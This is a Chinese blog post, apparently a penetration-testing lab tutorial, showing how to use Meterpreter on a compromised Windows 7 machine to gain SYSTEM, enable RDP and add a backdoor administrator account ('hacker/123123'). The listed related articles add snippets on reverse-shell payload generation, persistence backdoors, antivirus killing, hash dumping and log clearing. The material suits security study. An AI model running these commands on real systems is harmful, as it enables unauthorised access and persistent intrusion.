权限维持——Meterpreter后渗透阶段之远程桌面开启

最新推荐文章于 2024-11-01 17:49:58 发布

尝试学RE中

最新推荐文章于 2024-11-01 17:49:58 发布

阅读量2.4k

点赞数 12

分类专栏：网络渗透测试技术文章标签： metersphere

本文链接：https://blog.csdn.net/m0_70210435/article/details/134610183

版权

网络渗透测试技术专栏收录该内容

3 篇文章

订阅专栏

本文详细介绍了如何利用Meterpreter在KaliLinux作为攻击机，通过后渗透手段获取Windows7靶机的system权限，开启远程桌面功能，并创建新用户进行登录。步骤包括权限提升、启用RDP、添加用户和组等。

摘要生成于 C知道，由 DeepSeek-R1 满血版支持，前往体验 >

学习目标

学习利用Meterpreter后渗透阶段模块来开启靶机远程桌面

实验环境

攻击机：kali
靶机：windows7

实验内容

步骤一：建立session

跟上篇文章步骤一样

步骤二：后渗透之开启远程桌面

1.将当前session会话提升到system权限

命令：getsystem

在这里插入图片描述

2.启动目标机的远程桌面协议，对应3389端口

命令：run post/windows/manage/enable_rdp

在这里插入图片描述

3.靶机中新建一个账号便于我们登录，并给它分配管理员权限（使用），然后将其添加到"远程桌面用户"组中,首先进入shell

命令：shell

在这里插入图片描述

添加用户命令：net user hacker 123123 /add
加入用户组命令：net localgroup administrators hacker /add

在这里插入图片描述

4.在kaili中新建一个终端，利用rdesktop对靶机进行远程桌面连接

命令：rdesktop 靶机IP

在这里插入图片描述

5.使用刚创建的用户进行登录：hacker/123123
在这里插入图片描述

6.登录成功
在这里插入图片描述

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

尝试学RE中

关注关注

12
点赞
踩
19

收藏

觉得还不错? 一键收藏
0
评论
分享

复制链接

分享到 QQ

分享到新浪微博

扫一扫
举报

举报

专栏目录

【神兵利器】——187、MSF远程桌面

Fly_鹏程万里

10-16

196

在渗透测试中如果我们获取到了目标服务器的权限，此时我们可以考虑查看当前服务器是否有开启远程桌面，如果有开启远程桌面则可以通过图形化界面的方式进行远程操作，更加便捷，更加迅速，如果没有开启远程桌面，那么我们可以通过获取到的shell来执行命令开启远程桌面，随后进行利用。

[权限维持] Windows 权限维持 —— 影子账户后门 - 克隆账户

最新发布

Blue17 の小窝

02-28

831

问题描述分别在Windows和Linux操作系统上安装Metasploit软件，并运行Metasploit完成针对Linux靶机usermap_script漏洞的渗透攻击，尝试使用植入VNC图形化远程控制工具的攻击载荷，成功获得Linux靶机上的远程控制桌面。做权限维持的前提是你已经拿到了靶机的一个权限（一般还是高权限，不然部分后门你还没有权限写入），所以我们得先用攻击机生成一个木马文件，上传靶机后运行，先拿到靶机的一个权限。这部分我们站在防守者视角，来排查下高级款的影子账户后门。

参与评论您还未登录，请先登录后发表或查看评论

meterpreter实用命令---个人实战整理

weixin_44155363的博客

03-25

1654

meterpreter实用命令 1、background命令返回，把meterpreter后台挂起 2、session命令 session 命令可以查看已经成功获取的会话可以使用session -i 连接到指定序号的meterpreter会话已继续利用 3、shell命令获取目标主机的远程命令行shell 如果出错，考虑是目标主机限制了cmd.exe的访问权，可以使用migrate注入到管理...

【内网安全】——meterpreter使用攻略

qq_53058639的博客

01-26

1856

Metasploit中的Meterpreter模块在后渗透阶段具有强大的攻击力，本文主要整理了meterpreter的常用命令、脚本及使用方式。包含信息收集、提权、注册表操作、令牌操纵、哈希利用、后门植入等。

meterpreter后渗透之权限维持

weixin_44255856的博客

08-09

3164

Persistence后门使用此方法建议运行前关闭杀毒软件 Run post/windows/manage/killav 输入run persistence -S -U -X -i 5 -p 6666 -r 192.168.85.130创建一个持久性的后门。详细信息如下： -A 自动启动一个匹配的漏洞/多/处理程序来连接到代理 -L如果不使用%TEMP%，则选择目标主机中写入有效负载的...

MSF之meterpreter权限维持

梦想专栏

07-30

2146

00×01 首先，我们先来生成一个 meterpreter 类型的 PALOAD ： msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.2.133 LPORT=1211 X >x.exe 00×02 建立反弹处理 exploit ： use exploit/mutil/handler set payload wi...

内网渗透|后渗透之远程桌面

weixin_43718688的博客

05-06

1478

内网渗透|后渗透之远程桌面 0x00 前言在渗透过程中拿下一台主机后很多时候会选择开3389进远程桌面查看一下对方主机内有无一些有价值的东西可以利用，但是这也引出了一个问题，只要是登录进程就一定会留下痕迹，虽然在渗透完成后可以通过痕迹清理的方法清除自己登录的"证据"，但是在多次渗透的过程中我不禁产生了思考，有没有一种方法能够最大化的隐藏自己登陆过对方主机呢，于是便有了下文。 0x01 隐藏用户（影子用户）的创建与利用进行权限维持这里先提一个概念，在windows环境下创建用户如果后面带了一个 DOLLA

Meterpreter远程控制实验

2301_80010855的博客

11-01

397

Meterpreter 是 Metasploit 框架中的一个强大的后渗透工具，它作为一种特殊的有效载荷（payload），在成功利用漏洞后被用来与目标系统建立一个控制通道。它可以实现对被攻击目标的远程控制和管理，包括远程执行命令、上传和下载文件、远程截图、远程控制桌面等功能。

永恒之蓝漏洞复现（二）对目标靶机建立用户，并且开启靶机的远程桌面，使用该用户进行连接

wty923的博客

01-12

2088

对目标靶机建立用户，并且开启靶机的远程桌面，使用该用户进行连接

Kali——Meterpreter后渗透攻击模块-Metasploit的module模块衍生

qq_63167128的博客

03-07

1336

介绍：本文展示了Meterpreter作为Metasploit模块之一的简要概念讲解及攻击流程（也可以在windows系统中下载metasploit工具进行相关操作），工具详细教程可在Sangfor学习平台获取临时免费课程进行学习。挂个链接：深信服产业教育中心 Meterpreter模块作为后渗透攻击（该阶段通常从攻陷了目标的一些系统和获取了一部分区域系统管理权限后开始）模块的实施通道，可以根据渗透目标需求进行灵活拓展，涉及范围：信息收集，口令攫取，权限提升，内网拓展等等

Kali linux 学习笔记（九十七）metasploit framework——后渗透阶段（一） 2020.4.29

闵行小鱼塘

04-29

888

在获取shell后，需要扩大战果，提权，信息收集，渗透内网，永久后门

metasploit渗透框架使用说明——后面介绍后渗透模块和网络渗透

记录并分享学习安全的知识点..

01-04

1136

一、模块划分 MSF是渗透测试领域最流行的渗透测试框架，它有以下几个模块：辅助模块 (Auxiliary，扫描器)——扫描主机系统，寻找可用漏洞；渗透攻击模块 (Exploits)——选择并配置一个漏洞利用模块；攻击载荷模块 (Payloads)——选择并配置一个攻击载荷模块；后渗透攻击模块 (Post)——用于内网渗透的各种操作；编码器模块 (Encoders)——选择编码技术，绕过杀软（或其他免杀方式）；；所有模块位置：/usr/share/metasploit-framework/m

开启目标远程桌面服务方法总结

Kevin's Blog

11-12

6184

文章目录一、目的二、CMD之远程桌面服务2.1 查看远程桌面是否开启2.2 确认远程端口号是否默认2.3 确认远程桌面服务状态2.4 WMIC开启/关闭远程桌面（推荐）2.5 更改远程桌面端口（附）三、MSF开启目标远程桌面3.1 在MSF shell中开启远程桌面（推荐）3.1.1 优 / 缺点3.1.2 启动远程桌面前前期工作3.1.3 MSF shell中使用WMIC启动3.2 使用MSF enable_rdp模块3.2.1 优 / 缺点3.2.2 Meterpretr enable_rdp模块中启

后渗透——内网转发之利用reGeorg与proxychains在kali中连接远程桌面

爱国小白帽

03-19

2785

reGeorgs是HTTP端的代理工具，它提供了PHP、ASPX、JSP脚本，直接访问显示“Georg says, ‘All seems fine’”，表示脚本运行正常。实验环境： reGeorg-master代理工具 Windows Server 2008 R2 x64（192.168.70.128） Windows Server 2003（10.1.1.2） IIS服务器 kali ...

后渗透阶段的权限维持

Fly_鹏程万里

08-22

2660

前言当我们在渗透过程中通过漏洞获取到目标主机权限后，往往会因为服务器管理员发现和修补漏洞而导致对服务器权限的丢失，所以权限维持就显得很重要了。在windows主机中，我总结了下面几种权限维持的方法，不足之处还望各位大佬斧正。添加影子账户影子账户可以理解为和主体一模一样但是又看不见的账户，其隐蔽性较好，只能在注册表里面看到。首先，我们需要创建一个隐藏账号OMG$ 使用命令 net...

权限维持简单总结

Aiwin的博客

08-17

4908

权限维持简单总结

权限维持(什么是后门?如何留后门?)-Windows篇 (ﾟ益ﾟメ) 渗透测试

寻觅的博客

09-12

3142

来看看如何做开机自启!我们渗透一定要持久!

应急响应实战笔记03权限维持篇（6）

qq_59468567的博客

03-04

1016

在渗透测试中，有三个非常经典的渗透测试框架----Metasploit、Empire、Cobalt Strike。那么，通过漏洞获取到目标主机权限后，如何利用框架获得持久性权限呢？

永恒之蓝，【17-010】漏洞复现，实现远程桌面连接，超详细步骤，小白必看

weixin_62490257的博客

06-29

4181

永恒之蓝，【17-010】漏洞复现，实现远程桌面连接，超详细步骤，小白必看

meterpreter后渗透

04-07

Meterpreter是一种强大的后渗透工具，它可以在目标机器上执行各种命令和操作，包括文件系统访问、进程管理、网络扫描、密码破解、漏洞利用等等。在使用Meterpreter进行后渗透时，可以采取以下几个步骤： 1. 获取系统信息：使用sysinfo命令可以获取目标系统的详细信息，包括操作系统版本、硬件配置、用户信息等等，这些信息有助于后续的攻击操作。 2. 收集凭证信息：使用hashdump命令可以获取目标系统上保存的用户密码哈希值，然后可以使用破解工具进行破解，从而获取有效的登录凭证。 3. 扫描网络和主机：使用portscan和subnet命令可以对目标网络进行扫描，发现开放的服务和漏洞，然后可以使用exploit模块进行攻击。 4. 接管会话和持久化：使用migrate命令可以将Meterpreter会话转移到目标系统中的其他进程中，从而提高攻击的稳定性和隐蔽性。同时，还可以使用persist命令将Meterpreter程序持久化到目标系统中，以便于下次连接。 5. 进行攻击操作：利用Meterpreter的各种模块和命令，可以进行各种攻击操作，包括远程执行命令、上传下载文件、横向移动、权限提升、漏洞利用等等。 6. 残留清理：完成攻击后，应该进行残留的清理工作，包括删除日志文件、清除历史记录、删除痕迹等等，以避免被发现和追踪。总之，Meterpreter是一款非常强大的后渗透工具，可以帮助渗透测试人员和黑客更好地进行攻击和渗透测试工作。但是，在使用Meterpreter进行攻击时，应该遵循道德和法律的原则，避免对他人造成不必要的损害和危害。